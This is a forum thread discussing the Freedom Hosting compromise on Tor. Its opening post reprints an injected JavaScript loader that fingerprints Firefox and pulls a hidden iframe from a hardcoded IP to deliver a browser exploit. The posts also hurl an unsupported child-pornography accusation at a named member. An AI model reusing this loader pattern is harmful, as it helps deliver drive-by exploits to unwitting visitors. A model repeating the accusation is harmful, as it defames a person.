Results 1 to 12 of 12

Thread: 50% of all pedo sites on TOR compromised by FBI, Rollo cant decide if he should shit or go blind first

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Plutonium sonatine's Avatar
    Reputation
    7368
    Join Date
    Mar 2012
    Posts
    33,366
    Load Metric
    65626806

    50% of all pedo sites on TOR compromised by FBI, Rollo cant decide if he should shit or go blind first

    It doesnt matter really because neither is going to keep Rollo Tomasi out of jail for collecting child pornography, which is how he blows off steam after he gets stomped into wine every time he opens his mouth on the forum.

    Anyway, a TOR user cruising an .onion site noticed some strange traffic on his network and discovered that half the sites at least on "freedom hosting" aka .onion were serving this code:

    Code:
    function createCookie(name,value,minutes) {
            if (minutes) {
                    var date = new Date();
                    date.setTime(date.getTime()+(minutes*60*1000));
                    var expires = "; expires="+date.toGMTString();
            }
            else var expires = "";
            document.cookie = name+"="+value+expires+"; path=/";
    }
     
    function readCookie(name) {
        var nameEQ = name + "=";
        var ca = document.cookie.split(';');
        for(var i=0;i < ca.length;i++) {
            var c = ca[i];
            while (c.charAt(0)==' ') c = c.substring(1,c.length);
            if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
        }
        return null;
    }
     
    function isFF() {
        return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
    }
     
    function updatify() {
        var iframe = document.createElement('iframe');
        iframe.style.display = "inline";
        iframe.frameBorder = "0";
        iframe.scrolling = "no";
        iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
        iframe.height = "5";
        iframe.width = "*";
        document.body.appendChild(iframe);
    }
     
    function freedomhost() {
        if ( ! readCookie("n_serv") ) {
            createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
            updatify();
        }
    }
     
    function isReady()
    {
        if ( document.readyState === "interactive" || document.readyState === "complete" ) {
       
            if ( isFF() ) {
                //window.alert(window.location + "Firefox Detected.")
                freedomhost();
            }
        }
        else
        {
            setTimeout(isReady, 250);
        }
    }
    setTimeout(isReady, 250);
    Basically that checks to see if youre running the most popular TOR bundled version of Firefox on Windows.

    Which, inexplicably, no longer disables javascript by default.

    If so, this iframe is served:

    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";

    And a javascript exploit is delivered to the TOR browser, affording the remote actor shell access to your computer.

    Given the recent success at the FBI with gaining access to TOR pedo rings, it should be obvious whose sitting at ip 65.222.202.53.

    So basically if youre running TOR and you view anything on .onion, youre machine gets prawned by FBI.

    TORs response is basically "we are TOR, they are Freedom Hosting, this is between yall, we are looking into patching that exploit one of these days if we can.", so it sounds like TOR is basically perfectly ok with Rollo and his pedo ilk getting flushed down the drain.

    But Im totally sure silk road is secure.

    "Birds born in a cage think flying is an illness." - Alejandro Jodorowsky

    "America is not so much a nightmare as a non-dream. The American non-dream is precisely a move to wipe the dream out of existence. The dream is a spontaneous happening and therefore dangerous to a control system set up by the non-dreamers." -- William S. Burroughs

  2. #2
    Owner Dan Druff's Avatar
    Reputation
    10110
    Join Date
    Mar 2012
    Posts
    54,626
    Blog Entries
    2
    Load Metric
    65626806
    Wasn't TOR developed by the government in the first place?

    Pretty LOL that people use it to commit crimes and think they're anonymous.

  3. #3
    Plutonium sonatine's Avatar
    Reputation
    7368
    Join Date
    Mar 2012
    Posts
    33,366
    Load Metric
    65626806
    Yeah it was 100%, but its like crypto; even if you develop a high end algorithm, it doesnt mean you can compromise it. In fact the only way to attack the TOR protocol is to compromise nodes (which has also been done btw). Once you can view traffic taking place on a statistically significant number of TOR nodes, you can basically match an internal stream with a stream hitting a TOR access point, is my understanding.

    But breaking into the largest multi-tenant site host on the TOR network and dishing out browser based exploits to anyone viewing them is Serious Business and a quantum leap from passive monitoring to active exploitation and enumeration.
    "Birds born in a cage think flying is an illness." - Alejandro Jodorowsky

    "America is not so much a nightmare as a non-dream. The American non-dream is precisely a move to wipe the dream out of existence. The dream is a spontaneous happening and therefore dangerous to a control system set up by the non-dreamers." -- William S. Burroughs

  4. #4
    Platinum Rollo Tomasi's Avatar
    Reputation
    -106
    Join Date
    Mar 2012
    Location
    Gulfstream Park
    Posts
    2,817
    Load Metric
    65626806

  5. #5
    Gold anonamoose's Avatar
    Reputation
    127
    Join Date
    May 2012
    Posts
    2,038
    Load Metric
    65626806
    I never understood the logic behind people going "Oh, the government can't find me if I use this prepackaged software that everybody knows about? Sounds like there's nothing that can go wrong."

    I've never used TOR and I never plan to use TOR because I think it just screams "Look at me! I'm probably doing something illegal." more than anything. Even if I used it just for privacy there's just way too much shit on that network that's bad to justify using it vs. other means of privacy.

  6. #6
    Platinum DirtyB's Avatar
    Reputation
    664
    Join Date
    Mar 2012
    Posts
    2,927
    Load Metric
    65626806
    Quote Originally Posted by anonamoose View Post
    I never understood the logic behind people going "Oh, the government can't find me if I use this prepackaged software that everybody knows about? Sounds like there's nothing that can go wrong."

    I've never used TOR and I never plan to use TOR because I think it just screams "Look at me! I'm probably doing something illegal." more than anything. Even if I used it just for privacy there's just way too much shit on that network that's bad to justify using it vs. other means of privacy.
    In theory, software that everyone knows about can be secure using strong cryptography. And in theory, millions of eyes are reviewing all of the code involved and patching vulnerabilities. But as we've seen, all of this shit is laughably low rent. These super hackers had Javascript enabled, and it took months for someone to notice this suspicious traffic?

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Rollo Tomasi speaks out!
    By bottomset_69 in forum Flying Stupidity
    Replies: 0
    Last Post: 05-17-2013, 03:32 AM
  2. i stole a guys 1 dollar small blind
    By Zap_the_Fractions_Giraffe in forum Flying Stupidity
    Replies: 19
    Last Post: 02-28-2013, 05:08 PM
  3. Replies: 32
    Last Post: 02-04-2013, 12:44 AM
  4. Pedo-Reservations for pedophiles?
    By NaturalBornHustler in forum Flying Stupidity
    Replies: 12
    Last Post: 12-28-2012, 01:57 PM
  5. For the blind scot who apparently cannot read
    By 408Mike in forum Flying Stupidity
    Replies: 4
    Last Post: 03-15-2012, 08:38 AM